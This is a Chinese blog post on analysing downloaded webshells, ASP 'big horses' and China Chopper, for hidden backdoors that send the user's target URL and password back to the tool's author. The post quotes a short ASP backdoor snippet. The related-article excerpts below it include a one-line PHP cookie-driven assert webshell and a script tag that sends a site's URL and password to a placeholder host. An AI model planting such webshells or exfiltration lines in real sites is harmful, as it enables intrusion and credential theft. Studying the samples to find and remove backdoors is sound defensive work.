webshell相关之——webshell后门分析

最新推荐文章于 2024-03-27 17:38:23 发布
最新推荐文章于 2024-03-27 17:38:23 发布
阅读量1.5k 收藏 6
点赞数 2
分类专栏: web渗透测试与代码审计 #+ webshell相关 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43079958/article/details/105850861
版权

webshell后门分析

什么是WebShell

顾名思义,“web”的含义是需要服务器开放web服务;“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。

很多时候我们下载很多别人的webshell,我们要去判断这个webshell有没有后门,有的开发者通过后门让使用者中病毒,同时令目标网站有后门,从而获取我们的资源

(其实很多广告就是一种后门)

php,asp,jsp等都可以用记事本打开
首先先把密码改了

大马后门分析

1、解密脚本代码

通过查找代码非法登录几个关键字,发现这段代码是经过加密的,于是把函数execute改为msgbox这个函数, 进行解密明文输出

之后将文件格式改为VBS脚本执行

2、分析后门代码

 if request("%")="%" then
 Session("web2a2dmin") = UserPass
       URL()
  end if

3、编写后门利用工具

中国菜刀一句话后门分析

菜刀与大马不同 ,才用的CS框架,看不见源代码
因此通过协议来看有没有后门

打开WSockExpert软件,也可以选择其它抓包软件,选择需要监听的“中国菜刀”程序进程,双击
这个抓包软件可以针对windows下的进程进行抓包
在包中可以看见文件名
有一个包有一段代码开头为 密码=
采用base64解密代码
(有可能有的时候两层)
解码之后发现这段代码是把使用者主机名(菜刀链接地址)+URL+密码 发送给了开发者

其它脚本后门分析

我们可以通过通信解决有没有后门
最后在登录状态下
密码框 查看元素 网络
之后点击登录
仔细观察文件那里
点开之后可以看到也是把我们访问的文件发送给开发者了

温柔小薛
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2024年最全网络安全-webshell详解(原理、攻击、检测与防御)
2301_82242964的博客
05-03 955
利用文件上传漏洞、SQL注入漏洞、RCE漏洞等,将恶意文件放到web服务器中,也就是常说的”后门”,之后可以进行文件管理、数据库管理、远程命令执行、提权等恶意操作。总结:攻击层面还应考虑如何绕过系统上传webshell,如何隐藏webshell免查杀,防御方面应该考虑如何避免webshell被上传,如何查杀webshell。例如,文件上传漏洞中,将php代码放到jpg文件中,可以使用@运算符,以防发生任何错误。首先,利用文件上传漏洞,上传webshell文件。至此,可以进行文件管理,虚拟终端等。
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
应急响应实战笔记——入侵排查篇:④ 如何发现隐藏的 Webshell 后门
最新发布
君逍遥o
03-27 1217
如何在百万行代码里发现隐藏的后门?试想一下,如果你的网站被入侵,攻击者留下隐藏的后门,你真的都可以找出来吗?面对一个大中型的应用系统,数以百万级的代码行,是不可能做到每个文件每段代码进行手工检查的。即使是一款拥有 99.9% 的 Webshell 检出率的检测引擎,依然可能存在 Webshell 绕过的情况。另外,像暗链、网页劫持、页面跳转等常见的黑帽 SEO 手法,也很难通过手动检测或工具检测全部识别出来。最好的方式就是做文件完整性验证。
Linux系统的PHP-Webshell后门实验
A0000FF的博客
04-02 856
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。
网站漏洞测试 关于webshell木马后门检测
网站安全资讯
11-07 841
前段时间我们SINE安全收到客户的渗透测试服务委托,在这之前,客户网站受到攻击,数据被篡改,要求我们对网站进行全面的渗透测试,包括漏洞的检测与测试,逻辑漏洞.垂直水平越权漏洞,文件上传漏洞.等等服务项目,在进行安全测试之前,我们对客户的网站大体的了解了一下,整个平台网站,包括APP,安卓端,I...
攻击JavaWeb应用[8]-后门
Exploit的小站~
03-27 2057
0x00 背景 关于JavaWeb后门问题一直以来都比较少,而比较新奇的后门更少。在这里我分享几种比较有意思的JavaWeb后门给大家玩。 0x01 jspx后门 在如今的web应用当中如果想直接传个jsp已经变得比较难了,但是如果只限制了asp、php、jsp、aspx等这些常见的后缀应该怎样去突破呢?我在读tomcat的配置文件的时候看到jsp和jspx都是由org.apache
php木马webshell扫描器代码
12-18
php /* +————————————————————————–+ | Codz by indexphp Version:0.01 | | (c) 2009 indexphp | | http://www.indexphp.org | +————————————————————————–+ */ ...
WebShell技术分享.pptx
06-10
WebShell的基础概念包括其本质——取得对服务器某种程度上的操作权限。它通常是黑客入侵后留下的后门,常见类型有ASP、PHP、JSP或CGI等形式。WebShell的功能可广泛分为全功能型、文件管理型、命令执行型、上传型和一...
低调点扫描器|Web安全扫描器
10-20
——————————————————————————– 二、更新功能 1.优化主程序,增加程序稳定性 2.增加网站注入点扫描功能 3.增加轻量级网站后台扫描 4.增加网站Seo查询 5.增加网站Cms指纹识别(exp) 6....
WEB Shell (ASP)
08-18
**五、案例分析——mm.asp** "mm.asp"很可能是这个ASP Web Shell的实例。由于描述中提到"全部明文,没有加密",我们可以推断这个shell的命令执行部分是可见的,没有采用加密或混淆技术,这增加了被检测和防御的可能...
web 挖掘机 v1.1
09-13
1. **Webshell**:Webshell是一种通过Web服务端漏洞注入的后门程序,允许攻击者远程控制被黑网站,执行各种系统命令,如上传、下载文件,执行SQL查询等。 2. **Web挖掘工具**:这类工具用于检测Web应用程序的漏洞,...
PHP大马后门分析
qq_17754023的博客
02-28 3992
PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门分析大马文件 打开下载的php大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有后门 从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
WebShell攻击流程大揭秘: 渗透测试必备技能(网页后门
weixin_43263566的博客
01-25 1万+
Webshell(网页后门
“黑吃黑”webshell箱子
向阳-Y.的博客
11-13 6351
目录“黑吃黑”webshell箱子环境准备马中马预防后门反杀webshellbox “黑吃黑”webshell箱子 什么是webshell箱子?通俗一点的解释: 它可以让你在大马中植入后门,当别人用你植入过后门的大马去获取渗透别的网站时,你的webshellbox信封将会收到别人截获的密码! 环境准备 搭建一个asp的服务器,我们这里选用小旋风进行搭建http://lt.yx12345.com:90/yasuobao/jyx12345xiaoxuanfenglinshiaspfuwuqiminiban.z
一款免杀php大马的解密与去后门
热门推荐
暧昧倾城的专栏
02-07 1万+
<br />今天想找个php木马来管理自己的空间,但是手头没有,只好去网上找个,结果发现黑白网络有一个叫做“新版免杀php大马”的东西,于是下载了下来,我的avast果断给干掉了,尴尬 - -!好吧<br />于是关掉杀毒 ,重新下载,好吧,这是一个小插曲!、<br />刚下下来的php源文件下载在这里 http://down.qiannao.com/space/file/strivescript/share/2011/2/7/-514d-6740php-5927-9a6c_-521d-4e0b-8f7d
WEB漏洞-XSS跨站之订单及Shell箱子反杀
xhscxj的博客
01-23 471
shell箱子 很多人在网上发布大马,他们在大马中写入了后门。当你成功把有后门的大马上传到目标网站上时,大马就会把该网站的url以及密码发送给在大马留过后门的人。 $_SERVER['HTTP_HOST']//获取当前的url $_SERVER['PHP_SELF']//获取当前访问的文件路径 例子:(留后门的方式有很多,也有可能加密,这里只是举一个例子) 因为代码<script src='http://www.xxx.com/index.php?url=$url&pass=$passwor
Webshell后门分析
Williamanddog的博客
02-06 693
通过文件上传漏洞上传webshell 访问webshell地址: 可以通过post传参来执行命令,a=system("whoami"); 为什么可以通过post传参来执行系统命令呢? 分析一句话webshell的代码: php?>是php语言的格式,eval将括号内的字符串解析为php代码。 $_POST[test]为获取post参数test的值 @是抑制符号,屏蔽函数执行过程中遇到问题而产生的一些错误、警告信息,这样用户就看不到程序的 出错信息。
WebShell后门检测与WebShell箱子反杀
永远是少年
10-28 988
今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell后门检测与WebShell箱子反杀。 一、WebShell后门检测 二、WebShell后门原理 三、WebShell箱子反杀
云服务器可疑安全事件 警告:发现后门Webshell)文件网站后门 手动处理流程
06-30 5400
云服务器出现了可疑安全事件:包含WEBSHELL代码的日志/图片文件 处理流程
webshell后门
07-27
攻击者通过Webshell后门可以执行各种操作,比如上传、下载、删除文件,执行系统命令等。\[2\] 一个常见的Webshell后门示例是PHP代码,如下所示: ```php @$a = $_COOKIE\[1\]; $b =''; $c=''; @assert($b.$a); ?> ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值